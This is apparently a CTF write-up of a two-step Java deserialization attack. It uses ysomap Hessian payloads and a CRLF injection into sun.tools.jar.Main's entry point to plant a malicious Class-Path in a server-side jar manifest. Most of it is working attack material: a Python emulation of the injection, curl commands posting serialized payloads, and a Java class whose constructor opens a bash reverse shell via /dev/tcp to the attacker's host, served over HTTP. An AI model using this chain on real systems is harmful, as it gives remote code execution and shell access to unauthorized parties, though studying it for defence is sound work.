I think I don't understand Java very well.
The intended solution looks much easier, but I didn't find it.
I found another, more complicated solution to solve it.
The deserialization payloads are generated with ysomap.
Step 1 uses sun.tools.jar.Main.main to create a jar file on the server. The entry-point argument is vulnerable to CRLF injection, so I can inject a Class-Path attribute that points at my server into MANIFEST.MF.
Step 2 uses ysomap's built-in SwingLazyValueWithUrlClassLoaderBullet payload to load that jar file; the injected Class-Path then makes the class loader fetch the malicious Java class from my server.
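To make the step 1 primitive concrete, here is an added Python example (my own, not the write-up's tooling and not the JDK's code). It emulates what the jar tool writes into META-INF/MANIFEST.MF when the entry-point argument contains a CRLF, parses the manifest back the way a JVM does, and shows the injected Class-Path surfacing as a separate attribute. The attacker URL, the placeholder class bytes and the manifest writer are constructed stand-ins for the real `jar cfe` behaviour the write-up observed on the target; `is_safe_entry_point` is the check a server should apply before handing untrusted input to sun.tools.jar.Main.

```python
import io
import zipfile

# Assumptions (not from the original write-up's tooling): the attacker's HTTP
# server and jar name follow the write-up's setup, the victim JDK copies the
# entry-point argument verbatim into the Main-Class value, and manifest lines
# are short enough that no 72-byte continuation wrapping happens.
ATTACKER_JAR_URL = "http://127.0.0.1:8888/x.jar"

# Constructed stand-in for the bytes `jar` packs; a real jar holds a .class.
DUMMY_CLASS = b"\xca\xfe\xba\xbe" + b"\x00" * 12


def write_manifest(entry_point: str) -> bytes:
    """Emulate what `jar cfe <jar> <entry-point> ...` writes to
    META-INF/MANIFEST.MF: a CRLF-terminated `Name: value` block in which the
    entry point lands, unescaped, as the Main-Class value."""
    lines = [
        "Manifest-Version: 1.0",
        "Created-By: constructed example",
        "Main-Class: " + entry_point,
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("utf-8")


def parse_manifest(data: bytes) -> dict:
    """Parse the main section the way a JVM does: one attribute per line,
    CR, LF or CRLF terminated; the first blank line ends the main section."""
    attrs = {}
    for line in data.decode("utf-8").splitlines():
        if line == "":
            break
        name, sep, value = line.partition(":")
        if sep:
            attrs[name.strip()] = value.strip()
    return attrs


def build_jar(entry_point: str) -> bytes:
    """Pack a manifest plus one class entry into an in-memory jar (zip)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", write_manifest(entry_point))
        zf.writestr("MyExploit.class", DUMMY_CLASS)
    return buf.getvalue()


def class_path_of(jar_bytes: bytes):
    """Return the Class-Path a URLClassLoader would honour for this jar, or
    None when the manifest carries no such attribute."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        attrs = parse_manifest(zf.read("META-INF/MANIFEST.MF"))
    return attrs.get("Class-Path")


def is_safe_entry_point(entry_point: str) -> bool:
    """Validation a server-side caller should perform before passing untrusted
    input to sun.tools.jar.Main: a Java class name never contains CR, LF or
    other control characters, so their presence means header injection."""
    return not any(ord(c) < 0x20 or c == "\x7f" for c in entry_point)


# The injected entry point: a plausible class name followed by a CRLF and a
# second manifest attribute that the jar tool will write as its own line.
INJECTED_ENTRY_POINT = "MyExploit\r\nClass-Path: " + ATTACKER_JAR_URL

if __name__ == "__main__":
    for ep in ("MyExploit", INJECTED_ENTRY_POINT):
        jar = build_jar(ep)
        print(repr(ep), "-> Class-Path:", class_path_of(jar),
              "| safe:", is_safe_entry_point(ep))
```

The benign entry point yields a manifest without Class-Path; the injected one yields a manifest whose Main-Class is still the innocuous `MyExploit` while a new Class-Path line points at the attacker's host. That is exactly what step 2 relies on: when a URLClassLoader opens the jar it resolves the manifest's Class-Path entries as additional code sources, so loading the jar built in step 1 makes the JVM fetch x.jar from the injected URL.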
# step 1: generate the sun.tools.jar.Main payload and send it to the target;
# this builds the jar on the server with the CRLF-injected Class-Path in MANIFEST.MF
$ java -jar ysomap.jar script tools_jar.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueTestBullet.ser'
# step 2
# prepare x.jar: the class the injected Class-Path points at; its constructor
# spawns a reverse shell back to 127.0.0.1:8887
$ cat >MyExploit.java << 'EOF'
public class MyExploit {
    public MyExploit() {
        try {
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "bash -i >& /dev/tcp/127.0.0.1/8887 0>&1"});
        } catch (Exception e) {}
    }
}
EOF
$ javac MyExploit.java
$ jar cf x.jar MyExploit.class
# open an HTTP server that serves x.jar
$ python3 -m http.server 8888
# trigger the URLClassLoader payload, which loads the step 1 jar and, through its
# Class-Path, fetches and instantiates MyExploit from x.jar
$ java -jar ysomap.jar script url_class_loader.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueWithUrlClassLoaderBullet.ser'